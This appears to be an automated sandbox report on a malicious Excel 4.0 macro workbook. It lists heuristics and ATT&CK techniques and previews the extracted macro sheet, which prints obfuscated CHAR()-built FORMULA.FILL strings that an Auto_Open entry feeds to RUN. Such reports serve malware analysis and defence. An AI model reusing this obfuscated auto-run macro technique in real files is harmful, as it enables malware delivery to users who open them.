MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file is an Excel 4.0 macro-enabled workbook. Critical heuristics indicate the presence of an Auto_Open macro and the use of dangerous formula APIs, specifically RUN. This suggests the macro is designed to execute arbitrary commands or download and run a second-stage payload. The obfuscated formula in EN475, which uses CHAR() to construct strings, likely forms the command or URL for the payload.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 126311 bytes |
SHA-256: c8d052d01e0998e3b12269bea9d68496504e89467fe2893282c4588a2d5603d3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!HZ42852 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,H19,"",24.87500000000000000000 ' Sheet,FP24,"",-130.00000000000000000000 ' Sheet,DU35,"",-2.05555555555555535818 ' Sheet,EO153,"",0.17886178861788618044 ' Sheet,CF157,"",80.20003906249999658939 ' Sheet,HM186,"",-0.44047619047619046562 ' Sheet,BZ204,"",0.22113821138211381401 ' Sheet,JF369,"",-1.38461538461538458122 ' Sheet,CO402,"",-0.43421052631578949121 ' Sheet,EH444,"",1.19691119691119718382 ' Sheet,EN475,"FORMULA.FILL(CHAR(L61027/JM48224)&CHAR(DA18615+DT35925)&CHAR(DF16817/HA32474)&CHAR(FL52901/BV34373)&CHAR(JS59700-HW56873)&CHAR(DA18615*IA5845)&CHAR(DQ63877-GS4645)&CHAR(DA18615+CT55766)&CHAR(CR20512/CT60443)&CHAR(JS59700/ET11730)&CHAR(FS16813*BQ18387)&CHAR(DA18615*CV17915)&CHAR(DF16817+I43641)&CHAR(DF16817*EQ18336)&CHAR(DA18615/GH39295)&CHAR(L61027*CV2401)&CHAR(FS16813/BM58490)&CHAR(JS59700*ER60371)&CHAR(DA18615+IR57213)&CHAR(JS59700*GD60552)&CHAR(L61027-DC12403)&CHAR(CS17252-CK60095)&CHAR(FS16813+FV22366)&CHAR(DQ63877*ED32155)&CHAR(DB47758*HT44705)&CHAR(CS17252+CM62200)&CHAR(JS59700/IR16961)&CHAR(FL52901/CV36679)&CHAR(DA18615*DN24772)&CHAR(JS59700+DY60656)&CHAR(CR20512-HH10527)&CHAR(CR20512*X49548)&CHAR(L61027*GS7971)&CHAR(DA18615/GV11475)&CHAR(JS59700/DY35853)&CHAR(DB47758*CI59950)&CHAR(JS59700/JB11292)&CHAR(JS59700*GN3078),EN478)","" ' Sheet,BM476,"",-0.60360360360360365561 ' Sheet,EN476,"FORMULA.FILL(CHAR(DQ63877/EV5351)&CHAR(JS59700+JI43463)&CHAR(JS59700/IO1497)&CHAR(JS59700+FJ1884)&CHAR(FL52901*CZ18726)&CHAR(DA18615-GE27994)&CHAR(DF16817/GA30781)&CHAR(DQ63877-DU24050)&CHAR(DF16817/HO31137)&CHAR(JS59700*BI33750)&CHAR(DA18615+FY22391)&CHAR(DF16817*GK7563)&CHAR(DA18615/CD55922)&CHAR(DB47758+EB64488)&CHAR(DA18615+JD4555)&CHAR(DQ63877*EY46845)&CHAR(DA18615+IX11967)&CHAR(DQ63877+W57960)&CHAR(CR20512/CJ64101)&CHAR(CS17252/BP5127)&CHAR(CS17252/EZ14223)&CHAR(DB47758*GT14802)&CHAR(FL52901*BR6300),EN479)","" ' Sheet,EN477,"FORMULA.FILL(CHAR(CS17252*FX59421)&CHAR(DA18615+FF3120)&CHAR(DB47758/EV46773)&CHAR(DQ63877/IA13261)&CHAR(L61027*CB2910)&CHAR(DB47758/EC61892)&CHAR(CS17252+CL40695),EN480)","" ' Sheet,EN481,RUN(CA54808),"" ' Sheet,K490,"",-0.14030712244897958207 ' Sheet,EL551,"",-0.99099099099099097199 ' Sheet,ED560,"",-0.44047619047619046562 ' Sheet,EJ696,"SET.VALUE(GJ1150,GET.CELL(38,HB3346)*-78.00000000000000000000/2)","" ' Sheet,EJ697,GOTO(HK62927),"" ' Sheet,GR732,"",0.23611111111111110494 ' Sheet,FH771,"",0.03461538461538461731 ' Sheet,HF827,"",-0.76829268292682928454 ' Sheet,ET875,"",98.00000000000000000000 ' Sheet,HD884,"",240.00000000000000000000 ' Sheet,FM895,"",440.00000000000000000000 ' Sheet,DG936,"",147.00000000000000000000 ' Sheet,FO1018,"",0.56610476923076924471 ' Sheet,IB1037,"",-1.28571328571428589171 ' Sheet,IV1065,"",-224.50000000000000000000 ' Sheet,CL1107,"",-19.37500000000000000000 ' Sheet,FH1119,"",1.35087719298245612087 ' Sheet,HX1126,"",-3.26470588235294112422 ' Sheet,DS1131,"",-78.00000000000000000000 ' Sheet,FN1206,"",-0.39784946236559137756 ' Sheet,FT1262,"",-1.16417910447761197013 ' Sheet,IT1262,"",-0.63636363636363635354 ' Sheet,GR1318,"",1.05534105534105560054 ' Sheet,EN1337,"",0.87012987012987008661 ' Sheet,HV1348,"",0.00000000000000000000 ' Sheet,BW1350,"",0.12037037037037036369 ' Sheet,JE1353,"",3.66071428571428558740 ' Sheet,DR1408,"",-137.20000000000001705303 ' Sheet,IY1436,"",1.30833333333333334814 ' Sheet,HL1450,"",-0.12030075187969924144 ' Sheet,FV1481,"",267.50000000000000000000 ' Sheet,HP1481,"",141.00000000000000000000 ' Sheet,IO1497,"",1.18461538461538462563 ' Sheet,S1509,"",-0.23469387755102041893 ' Sheet,G1556,"",0.18981481481481482509 ' ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.